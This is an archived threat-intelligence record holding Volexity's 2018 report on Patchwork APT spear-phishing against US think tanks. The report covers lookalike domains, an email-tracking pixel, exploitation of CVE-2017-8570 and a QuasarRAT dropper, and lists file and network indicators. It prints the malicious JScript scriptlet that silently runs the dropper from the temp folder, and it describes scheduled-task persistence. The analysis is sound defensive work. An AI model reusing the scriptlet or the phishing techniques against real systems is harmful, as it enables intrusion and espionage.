{ "id": "ddaade60-cee6-443f-a787-e5ef6ca72c62", "created_at": "2026-04-06T00:15:51.848154Z", "updated_at": "2026-04-10T03:33:54.593839Z", "deleted_at": null, "sha1_hash": "4b7cd07ad68ff8bde356ee84ea22b0e918899684", "title": "Patchwork APT Group Targets US Think Tanks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3079547, "plain_text": "Patchwork APT Group Targets US Think Tanks\r\nBy mindgrub\r\nPublished: 2018-06-07 · Archived: 2026-04-05 15:08:05 UTC\r\nIn March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian\r\nAPT group also known as Dropping Elephant. This increase in threat activity was consistent with other\r\nobservations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on\r\nChinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what\r\nis most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based\r\nthink tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are\r\nleveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages.\r\nIn three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of\r\nwell-known think tank organizations in the United States. The group lifted articles and themes from the Council\r\non Foreign Relations (CFR), the Center for Strategic and International Studies (CSIS), and the Mercator Institute\r\nfor China Studies (MERICS) for use in their spear phishing lures and malicious Rich Text Format (RTF)\r\ndocuments. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign\r\nPolicy Research Institute (FPRI) in a message purporting to be from CFR. Each of the spear phishing attacks\r\ncontained links to .doc files, which were really RTF documents that attempt to exploit CVE-2017-8570\r\n(Composite Moniker). The threat actors appear to have leveraged publicly available exploit code that can be found\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 1 of 11\n\non Github at the URL: https://github.com/rxwx/CVE-2017-8570. If the exploit is successful, the threat actors will\nattempt to drop and execute QuasarRAT. Details of the malware and the associated attacks are listed below.\nSpear Phishing Messages\nEach e-mail was sent from the attacker-controlled domain mailcenter.support. This domain was not only used to\nsend the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted\nmessages, an embedded image tag is used to beacon home to the attacker’s domain, containing an unique\nidentifier specific to the recipient.\n![](3D”hxxps://www.mailcenter.support/track/\u003cunique_32_byte_identifier)” width=3D”0″\nheight=3D”0″ /\u003e\nWhile the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant)\nremained the same, certain elements differed across campaigns observed. Details on each of the messages are\nlisted below.\nMessage 1:\nHeaders Received: by mailcenter.support\nSender China Policy Analysis Subject Chinas Arctic Dream\nBody\nContent and images included within the e-mail body were a direct copy of the following CSIS\narticle:\nhttps://www.csis.org/analysis/chinas-arctic-dream\nNotes\nThe hyperlinked text Download File of “China’s Arctic Dream” within the e-mail body lead to\na malicious RTF document located at the URL\nhxxp://chinapolicyanalysis.org/Chinas_Arctic_Dream.doc.\nThe chinapolicyanalysis.org domain was used as the sender address, as well as the hosting\nlocation of the malicious RTF document.\nMessage 2:\nHeaders Received: by mailcenter.support\nSender Council on Foreign Relations Subject The Four Traps China May Fall Into\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\nPage 2 of 11\n\nBody\r\nContent and images included within the e-mail body were a direct copy of the following CFR\r\narticle:\r\nhttps://www.cfr.org/blog/four-traps-china-may-fall\r\nNotes\r\nMultiple hyperlinks within the e-mail body lead to a malicious RTF document located at the URL\r\nhxxp://fprii.net/The_Four_Traps_for_China.doc.\r\nThe fprii.net domain was used as the sender address, as well as the hosting location of the\r\nmalicious RTF document. The structure of the domain mimics the Foreign Policy Research\r\nInstitute (FPRI), whose actual domain is fpri.net.\r\nMessage 3:\r\nHeaders Received: by mailcenter.support\r\nSender Mercator Institute for China Studies \u003cpublications@mericcs.org\u003e\r\nSubject Authoritarian advance Responding to Chinas growing political influence in Europe\r\nBody\r\nContent and images included within the e-mail body were a direct copy of the following MERICS\r\nreport:\r\nhttps://www.merics.org/sites/default/files/2018-\r\n02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf\r\nNotes\r\nThe hyperlinked text Click here to download the report within the e-mail body lead to a\r\nmalicious RTF document located at the URL\r\nhxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc.\r\nThe mericcs.org domain was used as the sender address, as well as the hosting location of the\r\nmalicious RTF document. The structure of the domain mimics the Mercator Institute for China\r\nStudies (MERICS), whose actual domain is merics.org.\r\nSample Message\r\nThe image below shows an example of how the spear phishing message would look to a recipient.\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 3 of 11\n\nExploitation and Malware Execution\r\nUpon opening the above attachments, the recipient will be presented with a document that is a direct copy of a\r\nblog post or report released by the think tank organization being impersonated. At first glance, everything might\r\nlook legitimate, but in the background the target user has likely just been infected with QuasarRAT. QuasarRAT is\r\na freely available “remote (administration|access) tool” (RAT) written in C# and distributed via Github. This RAT\r\nprovides a variety of functionality that makes it particularly attractive to an attacker. This includes, but is not\r\nlimited to, the following:\r\nAES encryption of network communication\r\nFile management\r\nFunctionality to download, upload, and execute files\r\nKeylogging\r\nRemote desktop access\r\nRemote webcam viewing\r\nReverse proxy\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 4 of 11\n\nBrowser and FTP client password recovery\r\nThe images below are what a target user opening a malicious RTF document would see from within Microsoft\r\nWord.\r\nWhen the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the\r\n“packager trick” is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF\r\ndocument. Its called the “packager trick” because any file embedded in an RTF file using packager will be\r\nautomatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF\r\ndocument is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious\r\n“scriptlet” file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious\r\nscriptlet file (displayed below) clearly show the threat actor executing the initial “qrat.exe” dropper from the\r\ncurrent user’s %tmp% directory.\r\nNote: The scriptlet code is an exact match to that shown on the Github page referenced earlier for CVE-2017-\r\n8570. The string “fjzmpcjvqp” is unique and not something likely to be present if the code was not generated with\r\nthe same public POC exploit code.\r\n\u003c?XML version=”1.0″?\u003e\r\n\u003cscriptlet\u003e\r\n\u003cregistration description=”fjzmpcjvqp”\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 5 of 11\n\nprogid=”fjzmpcjvqp”\r\nversion=”1.00″\r\nclassid=”{204774CF-D251-4F02-855B-2BE70585184B}”\r\nremotable=”true” \u003e\r\n\u003c/registration\u003e\r\n\u003cscript language=”JScript”\u003e\r\n\u003c![CDATA[\r\nvar r = new ActiveXObject(“WScript.Shell”).Run(“cmd /c %tmp%\\qrat.exe”,0,false);\r\nexit();\r\n]]\u003e\r\n\u003c/script\u003e\r\n\u003c/scriptlet\u003e\r\nAfter the initial dropper (qrat.exe) has been executed by the embedded scriptlet, it creates a directory in\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0 and\r\nunpacks/drops the final QuasarRAT binary named microsoft_network.exe.\r\nThe malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on\r\nWindows systems. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from\r\nAirVPN.\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 6 of 11\n\nThis DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe,\r\nallowing it to remain persistent after reboot.\r\nAs seen in the image above, the QuasarRAT scheduled task is named Microsoft_Security_Task and runs at 12:00\r\nAM each day. Once the task is triggered, it will then repeat every 5 minutes for 60 days. When executed,\r\nmicrosoft_network.exe will initiate a request to freegeoip.net in order to determine the geographical location of\r\nthe infected host. Immediately following the request, the malware will begin to beacon over an encrypted\r\nconnection to the threat actor’s command and control domain tautiaos.com (43.249.37.199). Several related\r\nsamples were identified and are included in the File Indicators section below.\r\nConclusion\r\nThe addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an\r\nincreasing diversity in the geographic regions being targeted. While there were a few peculiar components to some\r\nof the spear phish messages, the campaigns and themes were strategically relevant to the organizations being\r\ntargeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 7 of 11\n\nthey are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing\r\nmessage. This information allows a threat actor to determine if their messages were delivered, which users are\r\nmore susceptible to opening them, and basic information regarding the target’s operating system and e-mail client\r\n(or browser). Finally, although the payload observed being delivered by Patchwork in these campaigns is a readily\r\navailable open source RAT, it does allow for flexibility in interacting with compromised machines without\r\nneeding to use custom malware. Volexity is actively tracking this group and the infrastructure currently in use for\r\nthe benefit of its network security monitoring and threat intelligence customers.\r\nFile Indicators\r\nSamples Observed from Spear Phishing Messages Above\r\nFilename Chinas_Arctic_Dream.doc\r\nFile Size 6587812 bytes\r\nMD5 598eeb6a18233023f3551097aa49b083\r\nSHA1 e9a46966f93fe15c22636a5033c61c725add8fa5\r\nNotes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.\r\nFilename The_Four_Traps_for_China.doc\r\nFile Size 4428595 bytes\r\nMD5 7659c41a30976d523bb0fbb8cde49094\r\nSHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5\r\nNotes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.\r\nFilename The_Four_Traps_for_China.doc\r\nFile Size 4428595 bytes\r\nMD5 7659c41a30976d523bb0fbb8cde49094\r\nSHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5\r\nNotes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.\r\nFilename qrat.exe\r\nFile Size 1093120 bytes\r\nMD5 c05e5131b196f43e1d02ca5ccc48ec0e\r\nSHA1 f28c592833f234c619917b5c7d8974840a810247\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 8 of 11\n\nNotes\r\nDropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file\r\nMicrosoft.Win32.TaskScheduler.dll.\r\nFilename microsoft_network.exe\r\nFile Size 846336 bytes\r\nMD5 9e4c373003c6d8f6597f96fc3ff1f49c\r\nSHA1 b7319a5ccf605fb2ff7760130e212728bccad323\r\nNotes\r\nQuasarRAT file that beacons to hardcoded IP 43.249.37.199 and the domain tautiaos.com. File is\r\ndropped to\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\r\nNetwork\\microsoft_network\\1.0.0.0\\microsoft_network.exe.\r\nFilename Microsoft.Win32.TaskScheduler.dll\r\nFile Size 204488 bytes\r\nMD5 6fa7fce844065ce9c605cbe713f3e170\r\nSHA1 2f7eaad80eab3e9dcc67a003968b35c227290c69\r\nNotes\r\n.NET Task Scheduler Managed Wrapper from https://github.com/dahall/taskschedule. The DLL\r\nis also digitally signed by a certificate from “AirVPN”.\r\nAdditional Observed Malware Files\r\nFilename Armed-Forces-Officers.doc\r\nFile Size 3226435 bytes\r\nMD5 89beb207e7095d237c4d25c4c6e17e97\r\nSHA1 15010f7cea913f2a36c56da7d73c2b9eb5a3878f\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops a Delphi RAT with the file\r\nname vsrss.exe.\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 9 of 11\n\nFilename Part-I.doc\r\nFile Size 11349102 bytes\r\nMD5 92942c54224cd462dd201ae11a560bb8\r\nSHA1 85a21624df2211af3daf05c86a3fbea8271059d3\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe. This\r\nis the same file described above.\r\nFilename Part-II.doc\r\nFile Size 10156713 bytes\r\nMD5 e32668e569362c96cc56db368b7e821e\r\nSHA1 dadc493abbe3e21610539e1d5a42f523626a6132\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe. Upon execution it will be installed under the filename crome.exe.\r\nFilename vsrss.exe\r\nFile Size 446976 bytes\r\nMD5 5c3456d5932544b779fe814133344fdb\r\nSHA1 7ab750afb25457a81c27a98dc6dfd51c27e61b0e\r\nNotes Delphi RAT file that beacons to ebeijingcn.live.\r\nFilename mico-audio.exe, crome.exe\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 10 of 11\n\nFile Size 494592 bytes\r\nMD5 2d8e9fb75e6e816cad38189691e9c9c8\r\nSHA1 2b9a2d5b34b4d79fdfd6c7b861311b12d1627163\r\nNotes\r\nQuasarRAT binary that beacons to hardcoded IP 209.58.176.201 and domain sastind-cn.org. File\r\nstarts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe.\r\nNetwork Indicators\r\nHostname IP Address Notes\r\nmailcenter.support 221.121.138.139 Domain used to for sending spear phishes and user tracking.\r\nchinapolicyanalysis.org 185.130.212.168\r\nDomain used for spear phish sender e-mail address and to host\r\nmalicious documents.\r\nfprii.net 185.130.212.254\r\nDomain used for spear phish sender e-mail address and to host\r\nmalicious documents.\r\nmericcs.org 221.121.138.141\r\nDomain used for spear phish sender e-mail address and to host\r\nmalicious documents.\r\ntautiaos.com 43.249.37.199\r\nCommand and control server observed from QuasarRAT\r\nmalware.\r\nsastind-cn.org 209.58.176.201\r\nCommand and control server observed from QuasarRAT\r\nmalware.\r\nebeijingcn.live 209.58.169.91\r\nCommand and control server observed from Delphi RAT\r\nmalware.\r\nSource: https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MISPGALAXY", "MITRE" ], "references": [ "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "report_names": [ "patchwork-apt-group-targets-us-think-tanks" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7ea1e0de-53b9-4059-802f-485884180701", "created_at": "2022-10-25T16:07:24.04846Z", "updated_at": "2026-04-10T02:00:04.84985Z", "deleted_at": null, "main_name": "Patchwork", "aliases": [ "APT-C-09", "ATK 11", "Capricorn Organisation", "Chinastrats", "Dropping Elephant", "G0040", "Maha Grass", "Quilted Tiger", "TG-4410", "Thirsty Gemini", "Zinc Emerson" ], "source_name": "ETDA:Patchwork", "tools": [ "AndroRAT", "Artra Downloader", "ArtraDownloader", "AutoIt backdoor", "BADNEWS", "BIRDDOG", "Bahamut", "Bozok", "Bozok RAT", "Brute Ratel", "Brute Ratel C4", "CinaRAT", "Crypta", "ForeIT", "JakyllHyde", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "NDiskMonitor", "Nadrac", "PGoShell", "PowerSploit", "PubFantacy", "Quasar RAT", "QuasarRAT", "Ragnatela", "Ragnatela RAT", "SocksBot", "TINYTYPHON", "Unknown Logger", "WSCSPL", "Yggdrasil" ], "source_id": "ETDA", "reports": null }, { "id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6", "created_at": "2022-10-25T15:50:23.285448Z", "updated_at": "2026-04-10T02:00:05.282202Z", "deleted_at": null, "main_name": "Patchwork", "aliases": [ "Hangover Group", "Dropping Elephant", "Chinastrats", "Operation Hangover" ], "source_name": "MITRE:Patchwork", "tools": [ "NDiskMonitor", "QuasarRAT", "BackConfig", "TINYTYPHON", "AutoIt backdoor", "PowerSploit", "BADNEWS", "Unknown Logger" ], "source_id": "MITRE", "reports": null }, { "id": "2b29dd16-a06f-4830-81a1-365443bc54b8", "created_at": "2023-01-06T13:46:38.460047Z", "updated_at": "2026-04-10T02:00:02.983931Z", "deleted_at": null, "main_name": "QUILTED TIGER", "aliases": [ "Chinastrats", "Sarit", "APT-C-09", "ZINC EMERSON", "ATK11", "G0040", "Orange Athos", "Thirsty Gemini", "Dropping Elephant" ], "source_name": "MISPGALAXY:QUILTED TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434551, "ts_updated_at": 1775792034, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.pdf", "text": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.txt", "img": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.jpg" } }